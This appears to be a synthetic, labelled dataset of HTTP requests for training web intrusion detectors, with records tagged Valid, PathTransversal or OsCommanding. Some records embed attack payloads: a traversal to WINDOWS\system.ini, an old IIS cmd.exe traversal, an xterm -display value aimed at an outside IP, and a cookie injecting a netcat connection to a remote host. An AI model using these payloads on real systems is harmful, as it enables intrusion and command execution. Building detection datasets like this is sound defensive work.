Referer: http://wsogc.com/rwdw/dOahl/QiFek.tiff
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.1 (Windows; U; Win98 7.4; td-at; rv:3.9.3) Gecko/86583716
UA-CPU: 68000
UA-Disp: 2081,300,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 032x7737
Via: srx/9.6 www.ineoe.gif, 1.0 www.qten2sa.png
Transfer-Encoding: gzip
Upgrade: pnge/0.2
Warning: 089 77.21.70.73 "oeaacxztie0eaee7elv" "Wed, 05 Oct 05 21:11:47 UTC"
X-Forwarded-For: 106.154.197.193
X-Serial-Number: 557318142
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 10308
Start - Id: 30952
class: Valid
GET /EZGmSptmpiW2G0xxterm/autoexecservicesUsHjp7Z.1/buiedlrIiih3qnt6a/lHXPp@STlCEw/ovU2HS9XHTrt9CLhcH/auohdbldh/osZ3DK.mspx? HTTP/1.1
Host: 16.251.11.157
Connection: ncxen
Accept: */*;q=0.1
Accept-Charset: windows-1255, iso-8859-8-i
Accept-Encoding: compress, gzip;q=0.5
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 83.148.36.70
Cookie: ajNbGX=a9;yhrhoufi=samohoaa4eiframeTh3;4weJtdEtuqq=2276638;toa5lYmm=1354106;ejyejclRokihis=745
Cookie2: $Version="61"
Date: Wed, 10 Sep 08 14:57:51 GMT
ETag: W/"CpTXQ611eV3t0JsHXPo4"
Expect: Whtamtlo=e0nh;iikcteo
From: 2teoy3o@9tooecavin.be
If-Modified-Since: Wed, 11 Nov 09 07:41:01 GMT
If-Unmodified-Since: Tue, 29 May 07 09:41:26 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 May 06 22:46:18 GMT
Max-Forwards: 1121
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM aWhhb25kZWVUYXNjaGlmaHRtUzhEdHVycjJzdG5vcHh3bmVob2hhOW1ScmRv
Authorization: Basic VXdmc0hzOnJ0NXM=
Range: -73
Referer: http://www.iatf.com/iVnl.php
TE: deflate;q=0.5,deflate;q=0.4
Trailer: Range
User-Agent: sJ41Y4C0W http://www.pbznts.uk
UA-CPU: PowerPC
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 454x053
Via: 0.1 www.4tneue.css, 2.0 www.eoec7uo.png:9307
Transfer-Encoding: identity
Upgrade: ioa/5.5
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 34.220.136.254
X-Serial-Number: 17732280940641123
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30952
Start - Id: 35989
class: PathTransversal
POST /bdrtgMensgreeuw/aWitOg2/Yieudmltelhihaeds2z/tnseb/NOaneat0eue/eypMXZc6OG2KStI01Rc/HjIiwp-KHozRYwhere/pjjHIAWlocationB/9yiiteoresen/n2divA8Nzjhome0arBa.html? HTTP/1.1
Content-Length: 214
Content-Language: 6urpclu,eskoyr,tptn
Content-Encoding: gzip
Content-Location: /stslosnr/ktles4/reokS6i/xfRNEh/ate6gow.swf
Content-MD5: bDYyZXMycmNhZm55aHBlMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Aug 04 12:48:27 CET
Last-Modified: Sun, 19 Aug 07 13:02:45 GMT
Host: 158.111.171.70:80
Connection: keep-alive
Accept: image/*;q=0.6, image/jpeg, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 221.251.39.195
Cookie: eatlpa3teDu=390;2ets3=lzpof;pecgge=d'3tt;2qPAxKhCMi=07;TGnjcvoe=phaving;erizuseemAonATt=99
Cookie2: $Version="01"
Date: Mon, 15 Jan 07 12:37:41 UTC
ETag: W/"Ek3BXcozS.u2Oc09Vcd"
Expect: 100-continue
From: hacs@cltuesA.com
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Wed, 13 Sep 06 15:25:08 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 27 Jul 04 24:14:13 CET
Max-Forwards: 7
MIME-Version: 5.1
Pragma: ourn='et7eh'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: hrcue njkeeom=86tfd5m
Range: 799-,4-,-692713
Referer: http://lvhiRed.uk/kkEg0pe.pdf
TE: deflate;q=0.5
Trailer: Accept-Encoding
User-Agent: 6uccNwng (dwlEfNM@4)
Via: HTTP/6.1 59.149.130.67, 7.8 181.30.123.181, 5aodr/6.6 124.179.236.156:9
Transfer-Encoding: gzip
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 420 www.esiroa.js "tdoieaa" "Wed, 03 Jan 07 09:34:59 GMT"
X-Forwarded-For: 121.207.12.204
~~~~~: ~~~~~~~~~~~~~~~~~~~~

tovvov51w=suee&u9=e-o4fdtrlS-&telnnavh=dA ernel7 \oc&nmifdmni=tVwbb7dE&4hf8=pe&y2tr=ofhztcqWqt5Z&lnseaekqvofeimg=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&zjdG=07327100&017MuOi2U=ePMTQDI42

End - Id: 35989
Start - Id: 9899
class: Valid
GET /ams/0yNQihJwxodRfm/t.9r_IJpZKttuvSpF5/o4b6rBpE-KXkDuxO/elee/1tb7-98tvOTftp/mVe8nsyamwTcP/rw@q3p@_920k/7sock_streamIHNy8/K5http3bG1v@7_.html?fehN7oj0ic=3633724&eotiee=235&lrp7=egn%2Blvareo3h&6w4a9mssrtdri=y++nircpleR%24processing-instruction3o4md&aacaecpe=winnt%7E&baaeenesErR4te=kreOsotnh&eycgnxa7tto=2162&xORXwRn=t11&phpstyleVXO=uulndr47evo80i&fg0aQbgsoundE@0Q=DinS&dlcnia7Noslh=a&oeaxi=845853 HTTP/1.1
Host: 163.105.101.232:80
Connection: Estf
Accept: */*;q=0.8
Accept-Charset: koi8-r, x-mac-icelandic, euc-jp
Accept-Encoding: identity
Accept-Language: *
Cache-Control: n=R
Client-ip: 79.46.22.252
Cookie: e0rsRehdtiuhon=87802859;srwerHueathwr=7andcmdtete;jUrb=1htpassxn ofee|Rhspa;udi=erk?w;rnph-B53qCwlY=upec5trrhedtaeb3
Cookie2: $Version="3"
Date: Wed, 15 Oct 08 12:52:06 GMT
ETag: "W1YghaQsoItNO1M"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Wed, 25 Feb 09 23:17:20 GMT
If-Unmodified-Since: Tue, 17 Nov 09 10:54:08 CET
If-Match: "9W3pOKD-c2OUdNxmMT"
If-None-Match: "YiXc@jWGVi-oLJgb_ZUW"
If-Range: *
Max-Forwards: 60
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZXJobjZsd3NMcnN0RWlwcG5pYWRob21lb3NubXh0b28ybnM=
Range: 3507-
Referer: /dd5qre.css
TE: gzip,trailers
Trailer: Referer
User-Agent: Mozilla/4.8 (compatible; iscof8ut; Linux i586; ineteute)
UA-CPU: StrongARM
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 475x606
Via: FTP/7.6 www.ztdE.jpg, 6.8 129.152.215.11
Transfer-Encoding: identity
Upgrade: lshhnT/1.9, eeb/3.9, Ia5/6.6, ttme/7.7
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 9554441251585
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9899
Start - Id: 19717
class: Valid
GET /aH/cqqR8H2ny.s1A7Op4/hiffhjzo/6cumcOfOooadttt/ioJ7t/Icmhujnc6aegenF/9eropkadtr6miuih/thMI2/ovV5nSlu1bm/7bnn/wBdww4Bbx-tD9p3E.jpeg?owso=so8fZYuiu&r8=tiA&3ieooloyq3H=a8jsj5eE HTTP/1.0
Host: 123.201.152.173
Connection: ehoo
Accept: */*;q=0.1
Accept-Charset: isiri-3342;q=0.5, iso-8859-1;q=0.3, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: cirtt0e-s
Cache-Control: no-transform
Client-ip: 63.103.106.189
Cookie: PjigrrL5=9;cn7=ettjB;yr1=5536789;foatz=7351434;io=ocB
Cookie2: $Version="61"
Date: Tue, 29 Sep 09 11:43:57 UTC
ETag: W/"1PO2JJfhSUOkitkfTR"
Expect: eahee
From: moea@estmzx.uk
If-Modified-Since: Tue, 19 Feb 08 08:45:42 UTC
If-Unmodified-Since: Thu, 22 Sep 05 17:03:45 CET
If-Match: *
If-None-Match: *
If-Range: "vxL80xOy6GBjGtCTPO5k"
Max-Forwards: 73
MIME-Version: 5.3
Pragma: tn1=bpgWR
Proxy-Authorization: 6dadch 0marE=vognya
Authorization: srYn weuaaas=pnoYtea
Range: 521-871
Referer: /n4rlnt/dvsfle1/avudue8r/ntwuheer.asp
TE: trailers
Trailer: Date
User-Agent: edola3a (tYU8kag; ciW-_S)
UA-CPU: PowerPC
UA-Disp: 2543,113,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 094x994
Via: HTTP/4.3 80.80.150.179, 0.9 www.vuebq.js, FTP/9.5 118.60.207.78
Transfer-Encoding: gzip
Upgrade: 2eglrr/4.5, A52ic/9.9, ntnlr/5.9, lahWl/8.7
Warning: 577 www.soDnr.shtml "epcbtilItta9ssLe" 
X-Forwarded-For: 209.213.51.4
X-Serial-Number: 8538612066
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 19717
Start - Id: 44006
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.ikiiez.gov
Connection: 9net
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, compress;q=0.7, gzip;q=0.5, compress
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 89.252.55.156
Cookie: 1ewlrje=8ibbtftpayvsin t
Cookie2: $Version="8"
Date: Fri, 20 Apr 07 06:38:50 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: inTns
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Sun, 30 Jan 05 11:37:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3081
MIME-Version: 9.9
Pragma: slap='s'
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: http://yoar5eah.ch/ihxswaCc/Itte3fb/oDti/bdcwTnl.pl
TE: chunked;q=0.3,gzip,trailers
Trailer: Host
User-Agent: Mozilla/3.3 (compatible; Konqueror/6.2; WinNT; tlPiab9; Uimee)
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: deflate
Upgrade: rnr/0.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44006
Start - Id: 761
class: Valid
GET /iFBSlocationR/nu@sbckxi7oR-12YnTVh/avraacapwr0aw/Ab/ubcQqE@mSNvyJUexrjh/dq/eo/eISw_e.o7kWJlPvFQ_D0/excQiOAHm1C0SlvQbjA.jpg?sdtrm5arT=3vtnOqZ8kek&e7oeajiua4nt=54381667&WlNaJ=hyanlen%5Du&gf2rhoaomebas=swe&6emrstfi=935&pdde=uKkpR_K_hnNx&eottyKassndnnst=40&NBdzUI.Cboot.ini=hsobinb&lhE1ilcdehek36=54&sibE=tro5e&asgqeheE=%5D&eaeaEeeq=nzNo4thn%7E+8&xecN=0oeovbscriptopen-Eti&oizEcn=7ocm&mde=eeMucgvirrtsat1t HTTP/1.1
Host: www.iods.ch:406
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-icelandic;q=0.0, iso-8859-5;q=0.4, iso-2022-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 197.141.119.53
Cookie: Fx7119a3Xlr9=40952;mstroi1htoterh4=s;hnioe=cQmr4
Cookie2: $Version="0"
Date: Sun, 14 Oct 07 12:39:11 UTC
ETag: "anvX4gw6DIXhJA2XR6I"
Expect: 100-continue
From: eet5ayi@trifo.it
If-Modified-Since: Thu, 15 Mar 07 03:14:49 CET
If-Unmodified-Since: Thu, 15 Apr 04 22:17:48 UTC
If-Match: *
If-None-Match: "MGgGHrIQJQ3Vxm1X-"
If-Range: *
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: 9eT6pJ noloyso=splar
Authorization: iiou Nerd=nrpanwnD
Range: 74705-710
Referer: http://stsd.st/hed3f/ntqe/eamnopU/sesei8mn/rrfpfva.tiff
TE: deflate,trailers,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (X11; U; Unix 9.5; ei-oi; rv:4.4.7) Gecko/36813114
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 802x453
Via: 7.8 27.107.78.69, HTTP/8.1 www.sniej0i.js
Transfer-Encoding: gzip
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 097 63.165.234.255 "88sneyi3e8nTe" "Thu, 16 Oct 08 07:24:34 GMT"
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 647816
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 761
Start - Id: 461
class: Valid
GET /mxmR0@Izu6/unOVehtuo5mrpdc/isucie/hI/enoe/plyh1.html?hH=724607&7nEe=4&HO1s1Y=ncbr&ntz3eTdani=4887122&osytntp=a8H7bdb4&ehttXrttenrxet9=r+rdropg&nnop8neiai1=C7eatrtEt&idQRNj=7457&iTthn=9&aDsTrieliy=629844 HTTP/1.0
Host: www.oosaeaaLtl.it
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: x-mac-arabic
Accept-Encoding: identity;q=0.3
Accept-Language: *;q=0.1
Cache-Control: mnre=hsaby
Client-ip: 121.253.96.194
Cookie: e3qXtplJs2=tnixs1natr;dgr=mas;4eloe=twx
Cookie2: $Version="305"
Date: Wed, 19 Jul 06 03:33:31 CET
ETag: W/"99Mw4G9Fs96hsTS6Z"
Expect: tm6aa1jn
From: s6uorr@haNlCme.org
If-Modified-Since: Mon, 09 Oct 06 14:12:34 CET
If-Unmodified-Since: Tue, 30 May 06 04:58:43 UTC
If-Match: "PyJvpgyy_O6ORkP"
If-None-Match: "xJEAEHQ1Nv4wiJzl"
If-Range: Sun, 06 Sep 09 01:51:49 UTC
Max-Forwards: 78
MIME-Version: 9.5
Pragma: eocGo='RaodaE'
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: NTLM aFhhMXdldFJrYW1sYTZhdGxpZGxpblVjbHNkZXJlR3hnMXM=
Range: 0733-,91-
Referer: http://teryh.fr/eh9mcic/aetBse/nNebpp.jsp
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/1.8 (Windows; U; WinNT 2.5; ge-ip; rv:1.2.9) Gecko/34827861
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7413x7082
Via: 1.1 www.e2daay.png, 2.1 www.notNaTt8.htm:13723, enatyf/2.0 www.ab4rdp.html
Transfer-Encoding: deflate
Upgrade: etajo/3.6, tst4/4.8
Warning: 370 www.8nio.htm "rfssr" "Wed, 09 Dec 09 08:20:10 UTC"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 461
Start - Id: 20658
class: Valid
GET /f4/TmBSsTc5j/rygyYh34buEVGxx0cw/XdrophttpMGeKEV@QNYXe/daxuteaadpnh5nl9al.htm?zi7ZAzqh.K_=tabrea0eoca9dtx&fRhg1mlnome=yslgxb%4030&etti=1898370&1u2RZeC=LqE4&bNjcacepqk=%5Deb+eep7oo&rieaae=homebolr&eo7m8etaEgtgl0a=qid HTTP/1.1
Host: www.rUgeo8az.net
Connection: keep-alive
Accept: video/mpeg;q=0.1, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n0-yf0lWeaa;q=0.5, 9shee1-pubenGlt, zrao3E-ksvai
Cache-Control: min-fresh=83034
Client-ip: 53.239.120.48
Cookie: beraPdcnz9abhd=Tshe 1ze$v89sainclude;csexecJS.=o3_79g;hains=070;eqndrutry=N3ib;bbtd31eeR=oH143gtlXZm
Cookie2: $Version="502"
Date: Tue, 13 Jun 06 06:32:28 CET
ETag: W/"Bn6eOYe9yVPtU0NkOL"
Expect: 100-continue
From: ihe4r@bhoxbwdih.net
If-Modified-Since: Mon, 13 Oct 08 23:01:21 GMT
If-Unmodified-Since: Sun, 31 Oct 04 19:34:07 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 17:18:18 UTC
Max-Forwards: 35
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM blR3aXRvbDZmb2RpbHVydkVtcWRtblNubFRiZnpwYXVuZXA=
Authorization: Basic ZFRzaXg6YWVyZnM=
Range: 28-,-887274
Referer: http://www.iS1Eg1es.it/7a6fa.mdb
TE: gzip;q=0.4,trailers
Trailer: Cache-Control
User-Agent: r3ixr7ti http://www.pbuqare.st
UA-CPU: PowerPC
UA-Disp: 629,430,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 060x083
Via: 4.5 www.s7a7eiv.jpg
Transfer-Encoding: deflate
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 223.197.65.113
X-Serial-Number: 5076474015762561578
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20658
Start - Id: 20667
class: Valid
GET /csstIrnbodoy2hl9Ebxa/er/yr5iaPeo/zl6liIdIcniwdv3gre/gDrhpz/rsI/o@q2/o.2Lk0SY7keLedM0R.jpg?ltos1dureocmrmi=yaSk8M&ds6n=71857&eZnhedetc9re=5265&rileaToaanx=e1E&o5rce3ojMgsol=9557&sTgpkocuapiuT=kKVLSB&uuhenaw=%7C&rtuhDenessntao=lbe&k5uehstane74=n5eRUq6i&gDhHn0R=h+Ht&drItdispurl=3261&oNaml=645562&onodeeiu27t7sbd=ehti%24tm2p HTTP/1.1
Host: www.hnuLr.be
Connection: close
Accept: image/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 186.118.225.35
Cookie: o6mau3mIrr=dpnHkyi;puaetlqndl=ler;asd5tmeg30=tednodeu
Cookie2: $Version="997"
Date: Sat, 23 Jan 10 19:27:35 UTC
ETag: "G@B-0QP3EDTa6ku"
Expect: lzbae7l0=hRllsaku
From: sxsmt@eelh.st
If-Modified-Since: Tue, 05 Oct 04 12:54:57 UTC
If-Unmodified-Since: Fri, 27 Jul 07 19:22:40 UTC
If-Match: *
If-None-Match: "VlK4UmZi2oOERl4mz"
If-Range: Wed, 27 May 09 18:45:13 UTC
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: 9tds enhrjeg=1sMoeteD
Authorization: NTLM dGpib2VzbzNvcmFlNlNxdGFubGFpQnQwaGFuZTZlZEFtdXc3ZWU=
Range: 28-,-887274
Referer: /rn1u7edi/oadolani/aNeSwrSr/roeD.php
TE: chunked;q=0.8,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: acbl/7.5.1
UA-CPU: PowerPC
UA-Disp: 268,853,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 413x553
Via: 2.0 www.7c1tg.html, 0.6 251.105.241.205:4294
Transfer-Encoding: identity
Upgrade: uetty/9.5, 9so2/7.4, stjts/1.7, yh7t/7.0
Warning: 161 www.yspael.tiff:6088 "aiusaddtrh" "Sat, 10 Jun 06 17:32:05 UTC"
X-Forwarded-For: 122.67.136.152
X-Serial-Number: 7399609
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20667
Start - Id: 43403
class: OsCommanding
GET /74e4c/UkSI.iframe2MQ-a9v/dtldehfsna/tUEAHgsfrKqO2bL_nK/echox9PMBaR/Krcp/sotaSotonssul/ic_Yqv.Sj7-lhIm@LmU/Oeeges/rmebbInnAt3ht6ff/5Aw/nD.SfptDs4XyNwb.tiff?7raafo9Mbfcax=118210699&tra7h5steek8p=78143994&r9iizEtftwdshsn=%5Cr+++xterm+++++-display++++111.242.253.81%3A0.0&nH=87&osrri=wzfacd+&tte=e.D6t HTTP/1.1
Host: 36.68.172.16:80
Connection: eueCg
Accept: */*;q=0.0
Accept-Charset: x-mac-korean, windows-1257, iso-8859-4, windows-1258;q=0.6, windows-1252
Accept-Encoding: 
Accept-Language: An-a;q=0.5, 5hmc-eltnyse, ntet-i, 7e-eSgr4, Beeeew1-yeawwi;q=0.6
Cache-Control: only-if-cached
Client-ip: 19.131.79.59
Cookie: cazpdrd=o7g5
Cookie2: $Version="4"
Date: Sun, 18 Jul 04 15:52:07 CET
ETag: W/"FBRRehdBHitCX2E"
Expect: n0nee
From: su7olsim@shSdnne.cz
If-Modified-Since: Fri, 22 Sep 06 07:26:57 UTC
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: *
If-None-Match: "g@kDwcj59B4mYBB"
If-Range: Sun, 12 Sep 04 22:37:09 GMT
Max-Forwards: 3545
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mertS.cz/iitepr/E6ydsge.msf
Range: -4315,8885-439,063-
Referer: http://tO2lhm3.de/sztdn0ie.asmx
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: e4IARsKZ http://www.Uwnhr67g.biz
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: t8h/0.5 180.32.184.80:2246, 4.3 250.251.227.123, xedy/3.9 www.5axidlj.css
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43403
Start - Id: 18361
class: Valid
GET /ictnfyunTemehZh/JObody4MbIPrkXhtaccesY/h-4/enwdahciwmE/skFy44sTQ2Pdt./ppbs4/gAQuY/eK80z9AGLlmc.nsf?ewaoger=462128&nij=h0EiineS%7C&uI60o=05&rhhecnyth=opttdRa HTTP/1.1
Host: www.eubented.uk
Connection: 2Bsrtct
Accept: video/*;q=0.8, video/mpeg;q=0.3, image/*
Accept-Charset: windows-1257
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 134.170.146.150
Cookie: Puihsunyhmponr=e?nA;tfinsrefotzt=d|uda|-ree;iOvAshi= t'h;elXre94getien3=usm+irteoptrne;oieaOAewat3c=dtl-access_log
Cookie2: $Version="0"
Date: Sun, 11 Mar 07 13:43:30 UTC
ETag: "FVX-q8xwH0u-3SCo"
Expect: 100-continue
From: laeeuer@lnsmToe.com
If-Modified-Since: Thu, 09 Apr 09 03:57:38 GMT
If-Unmodified-Since: Sun, 15 Nov 09 19:33:00 CET
If-Match: "1xzjOrazvGWu.yPje8"
If-None-Match: "1pCCbzAkNLSydmT"
If-Range: Fri, 11 Apr 08 12:37:19 GMT
Max-Forwards: 69
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Ta4ne eeunze=ehg4j4se
Range: 46-911,1628-,-64810
Referer: http://www.cchEC.st/rdtl/ohltsi3c/emhlneti/ygyna2.aspx
TE: trailers,chunked
Trailer: If-Match
User-Agent: Mozilla/4.2 (compatible; FM5udt; Windows NT; eoan; orbht5hath)
UA-CPU: x86
UA-Disp: 7961,862,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0744x394
Via: 5.9 238.122.96.10, ibl5/7.8 www.slhatmss.shtml
Transfer-Encoding: swoj
Upgrade: ecIbng/7.0, e4sr/1.5, 16e1d/2.9
Warning: 749 108.217.159.253:908 "s7e4ipslsmltnjmoswu2" 
X-Forwarded-For: 141.181.107.204
X-Serial-Number: 185669982950
----: -----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18361
Start - Id: 22391
class: Valid
GET /sN/oSb6esnXNQM5z/riy5shoPsgsk3fh/an2e.nsf?Crosotto4krrtk=r+hwy&fltgmUiugdli=398203&ada85nnnUcsa=ubt+mnv%5B0o5sn+%3By&nr0=66m.uwGawd&ssd0fbeuhue9a=iogt%5DaoBehevPal&eshxs=sH35W5&t3sexa1yittz1id=1s%3DnseOws6v&HItpf=18&nofgL55=48801124 HTTP/1.1
Host: 88.41.52.149
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 243.52.144.44
Cookie: 3t5oIaRs=omnn;LQEGxvrFy=nt2xMoes3aliconnectg;;PperllXNa=9882353
Cookie2: $Version="985"
Date: Wed, 21 Jan 04 08:07:07 CET
ETag: W/"lwb8dSM.UWBVcy1"
Expect: mehpgn
From: 1eNTR8ie@q3cs.biz
If-Modified-Since: Fri, 12 Jan 07 24:47:16 GMT
If-Unmodified-Since: Wed, 25 Jan 06 12:41:04 UTC
If-Match: "xSEx_6fIgNyNB9FA5F"
If-None-Match: "A57DO_XXYpa05DNuGCd"
If-Range: Thu, 25 Feb 10 11:30:05 UTC
Max-Forwards: 9
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: rnic hovsi9ai=hhcDiun8
Authorization: NTLM cWxkdE1xY2VPbDY4MmFoZWVkdGV5bW9xenlyUG5vZXBsYnJBYWlBcmhpc3l0UnNk
Range: 763-9
Referer: http://www.nhkzxI.biz/s7do/nlfddhq/aheir.aspx
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: repWdas (0p9TWQaMnH; iB4cCUbCE; tr7CfRv; rqjLlS; 579Cht)
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/1.7 www.ue92.html, 8.5 106.215.180.123, a5eC/2.9 134.93.37.126
Transfer-Encoding: deflate
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22391
Start - Id: 42991
class: OsCommanding
GET /Xgo0elUu/c1m85JDU4N/catne6Eintrn3eh9udoe/t9rnieshaIane8t/hbgetmkat/no/Sahavapesczhcrsgd/sx/sibt9terE/aamhhauJp640.exe? HTTP/1.0
Host: www.0nlEDhua4m.de
Connection: qsc9h
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: deflate
Accept-Language: Tawpet-ewhesht
Cache-Control: no-transform
Client-ip: 84.109.218.207
Cookie: etmfetdsilIuex=83013;LqorseXk=|/usr/bin/nc    -vvv    238.213.224.172   80%00;tyatndteoehEre=du3p;Sh=5Rewcmmst5g;aawE=sut;style2SeI3vx=sbQAOM7u
Cookie2: $Version="767"
Date: Mon, 26 May 08 16:32:39 GMT
ETag: W/"kdLJHbutb6RMAdw2uu2"
Expect: 0ae8h
If-Modified-Since: Fri, 19 Aug 05 19:36:11 UTC
If-Unmodified-Since: Mon, 29 Jan 07 15:57:32 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5401
MIME-Version: 7.5
Proxy-Authorization: laahq noaeo=epl8
Range: -824908
Referer: http://bkgnntn.org/c1assiwd/e6sitr.php
TE: gzip
Trailer: User-Agent
User-Agent: Ge7ehRIhe (ybQ8a0Oi; 7e3jjH)
UA-OS: WinNT
Transfer-Encoding: compress
Upgrade: 5sZar/3.5, hg2/7.4, hai/2.7
Warning: 257 40.218.139.79 "wigetselds1erfEotm" "Wed, 07 Apr 10 24:49:11 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42991
Start - Id: 15526
class: Valid
GET /ds/tbcmqt1aaceQI.aspx?v_kgeshutdownFmNCCM=si+&sa2sr=emrt HTTP/1.1
Host: 60.141.202.84
Connection: iaLccs
Accept: application/x-tar, text/*;q=0.7, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-stale=18489
Client-ip: 111.222.87.162
Cookie: KMc9I=a;8QGRKacceptDXpkxg=e1vi.un;riEsi7etjase=nliT
Cookie2: $Version="524"
Date: Tue, 20 Sep 05 24:50:54 CET
ETag: W/"6fDeYhzV1EV3KtjC"
Expect: 84aCa6
From: seean@8ua2seurko.de
